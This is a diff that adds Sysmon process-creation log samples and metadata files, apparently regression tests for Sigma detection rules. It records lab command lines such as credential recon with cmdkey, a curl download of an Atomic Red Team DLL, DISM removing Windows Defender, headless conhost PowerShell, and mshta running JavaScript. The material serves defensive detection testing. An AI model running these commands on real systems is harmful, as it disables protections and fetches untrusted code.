regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/b1ec66c6-f4d1-4b5c-96dd-af28ccae7727.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx new file mode 100644 index 000000000..0899acbdc Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json new file mode 100644 index 000000000..50408f0db --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:21:33.116889Z" + } + }, + "EventRecordID": 8581967, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:21:33.111", + "ProcessGuid": "5AA13A44-CEDD-68FC-1B30-000000004002", + "ProcessId": 7876, + "Image": "C:\\Windows\\System32\\cmdkey.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Credential Manager Command Line Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "cmdkey.exe", + "CommandLine": "cmdkey /list", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=138CCC1346F17921DC1DF71C88F472ACCC24BC5F,MD5=8B20EBCF5A2C5410B43765B5CEA17E5B,SHA256=F71C08CB7630990EE46338937897C0A83C96DFB8F37DB70322CE7417C01157AA,IMPHASH=03AD7A1AF78BF7A500FB199CABE4C34A", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml new file mode 100644 index 000000000..041649eee --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml @@ -0,0 +1,13 @@ +id: aa97fab6-a83e-4e4f-ad0b-f0cc2a43c24e +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 07f8bdc2-c9b3-472a-9817-5a670b872f53 + title: Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/07f8bdc2-c9b3-472a-9817-5a670b872f53.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx b/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx new file mode 100644 index 000000000..2bda8a11e Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.json b/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.json new file mode 100644 index 000000000..53caa5ede --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:38:32.006926Z" + } + }, + "EventRecordID": 12090706, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:38:32.006", + "ProcessGuid": "5AA13A44-0B18-68FD-6336-000000004002", + "ProcessId": 7232, + "Image": "C:\\Windows\\System32\\conhost.exe", + "FileVersion": "10.0.20348.4294 (WinBuild.160101.0800)", + "Description": "Console Window Host", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CONHOST.EXE", + "CommandLine": "conhost --headless powershell calc", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=061B747FBA99B050D8874167AAD6D1D790F8A3A8,MD5=7E13A7EA7BD3601760E3838D99E31710,SHA256=D7714ECAE976F14B3AFA409FF5A3616E8D6D0CCE8269E611D7835A7C12235D6B,IMPHASH=AFF4D1EA89D0D66F7D04180143E61D12", + "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002", + "ParentProcessId": 3204, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml b/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml new file mode 100644 index 000000000..2b32667bf --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml @@ -0,0 +1,13 @@ +id: 6e70bb8b-561e-4af4-bad6-f582c656d047 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 056c7317-9a09-4bd4-9067-d051312752ea + title: Powershell Executed From Headless ConHost Process +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/056c7317-9a09-4bd4-9067-d051312752ea.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx new file mode 100644 index 000000000..0dc74bef2 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json new file mode 100644 index 000000000..aebb8f310 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:23:21.381915Z" + } + }, + "EventRecordID": 8613670, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:23:21.362", + "ProcessGuid": "5AA13A44-CF49-68FC-2630-000000004002", + "ProcessId": 9032, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.13.0", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\users\\public\\music\\allthethingsx64.dll", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=A1BD7848E36F22021C68F4F24EDFDB7ACE42FCA3,MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml new file mode 100644 index 000000000..66f1312ef --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml @@ -0,0 +1,13 @@ +id: e2254736-78df-48bf-acd9-e36f914e21bc +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 + title: Suspicious Curl.EXE Download +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx b/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx new file mode 100644 index 000000000..68165e60f Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.json b/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.json new file mode 100644 index 000000000..e934af837 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:41:03.540138Z" + } + }, + "EventRecordID": 8933629, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:41:03.533", + "ProcessGuid": "5AA13A44-D36F-68FC-CE30-000000004002", + "ProcessId": 5956, + "Image": "C:\\Users\\Administrator\\Downloads\\DirLister.exe", + "FileVersion": "2.0.0.0", + "Description": "DirLister.UI", + "Product": "DirLister.UI", + "Company": "DirLister", + "OriginalFileName": "DirLister.exe", + "CommandLine": "\"C:\\Users\\Administrator\\Downloads\\DirLister.exe\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=561771830EDE663651F3E6D731656D5D9E2BB19A,MD5=909E97D239C54B4563B61573FAE63C22,SHA256=C939927D7AB06E05B1B6E4951E8F7C45E54BA4EC3CA9399D7E1D9F5CA67C849C,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744", + "ParentProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ParentProcessId": 7680, + "ParentImage": "C:\\Windows\\explorer.exe", + "ParentCommandLine": "\"C:\\Windows\\explorer.exe\" /NoUACCheck", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/info.yml new file mode 100644 index 000000000..7b674a61a --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_dirlister_execution/info.yml @@ -0,0 +1,13 @@ +id: 3e64088e-d05c-4e03-ac62-d5961672d33e +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: b4dc61f5-6cce-468e-a608-b48b469feaa2 + title: DirLister Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx b/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx new file mode 100644 index 000000000..761e53394 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.json b/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.json new file mode 100644 index 000000000..3af45afcc --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:44:33.440907Z" + } + }, + "EventRecordID": 8999629, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:44:33.433", + "ProcessGuid": "5AA13A44-D441-68FC-E330-000000004002", + "ProcessId": 7112, + "Image": "C:\\Windows\\System32\\reg.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Registry Console Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "reg.exe", + "CommandLine": "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\" /v CurrentBuildNumber", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=E65FAA187D27D84106B78B909C06D405837EC64E,MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml b/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml new file mode 100644 index 000000000..557e59e5d --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml @@ -0,0 +1,13 @@ +id: 23b1ddfe-cb7d-4e2f-9ae3-d96eabe0f6e1 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 0022869c-49f7-4ff2-ba03-85ac42ddac58 + title: System Information Discovery via Registry Queries +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.evtx b/regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.evtx new file mode 100644 index 000000000..6b65baa6f Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.json b/regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.json new file mode 100644 index 000000000..1f64e5728 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:47:34.903176Z" + } + }, + "EventRecordID": 9055342, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:47:34.894", + "ProcessGuid": "5AA13A44-D4F6-68FC-F430-000000004002", + "ProcessId": 7808, + "Image": "C:\\Windows\\System32\\Dism.exe", + "FileVersion": "10.0.20348.2849 (WinBuild.160101.0800)", + "Description": "Dism Image Servicing Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "DISM.EXE", + "CommandLine": "Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=0AABFEC24BA5FC8806492DCCE89094743219EDE4,MD5=0B1CB657FF6BF807D830A5B970ECC041,SHA256=1B1EC450CE9B4559C6A2AE8ED5D8715F5135BE20257DC84ED11EBB814F29A1F2,IMPHASH=7B40129B2F7F51468E0954D5A44D9CDD", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_dism_remove/info.yml b/regression_data/windows/process_creation/proc_creation_win_dism_remove/info.yml new file mode 100644 index 000000000..3ed51243f --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_dism_remove/info.yml @@ -0,0 +1,13 @@ +id: b4459771-0fe5-4777-be95-ea6fce92d1fc +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 43e32da2-fdd0-4156-90de-50dfd62636f9 + title: Dism Remove Online Package +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx new file mode 100644 index 000000000..c491237b3 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json new file mode 100644 index 000000000..d2d824504 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:53:43.425641Z" + } + }, + "EventRecordID": 33534161, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:53:43.425", + "ProcessGuid": "5AA13A44-B487-68FE-7F5F-000000004002", + "ProcessId": 2052, + "Image": "C:\\Windows\\System32\\driverquery.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Queries the drivers on a system", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "drvqry.exe", + "CommandLine": "\"C:\\Windows\\System32\\driverquery.exe\"", + "CurrentDirectory": "C:\\Windows\\Temp\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=67241EC6E9855CEE71833940C4BB504BB1A50298,MD5=F4D90639E3DA5F6C514495F20AE0322A,SHA256=2202CE439C7DE1CECABA76534B5B7646E0BE585E72E129C86D6B8AFB67F7D212,IMPHASH=033B70299A7F2D13D2CCD201F2FD5461", + "ParentProcessGuid": "5AA13A44-B487-68FE-7E5F-000000004002", + "ParentProcessId": 11360, + "ParentImage": "C:\\Windows\\System32\\mshta.exe", + "ParentCommandLine": "mshta \"javascript:new ActiveXObject('WScript.Shell').Run('driverquery.exe');close();\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml new file mode 100644 index 000000000..4cc1aabef --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml @@ -0,0 +1,12 @@ +id: 585f7fa9-392b-4609-b324-4701482de7ec +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd + title: Potential Recon Activity Using DriverQuery.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx b/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx new file mode 100644 index 000000000..0cb95a003 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.json b/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.json new file mode 100644 index 000000000..e4e8c7d94 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:47:36.476583Z" + } + }, + "EventRecordID": 33403755, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:47:36.462", + "ProcessGuid": "5AA13A44-B318-68FE-4B5F-000000004002", + "ProcessId": 8840, + "Image": "C:\\Windows\\System32\\driverquery.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Queries the drivers on a system", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "drvqry.exe", + "CommandLine": "driverquery", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=67241EC6E9855CEE71833940C4BB504BB1A50298,MD5=F4D90639E3DA5F6C514495F20AE0322A,SHA256=2202CE439C7DE1CECABA76534B5B7646E0BE585E72E129C86D6B8AFB67F7D212,IMPHASH=033B70299A7F2D13D2CCD201F2FD5461", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": 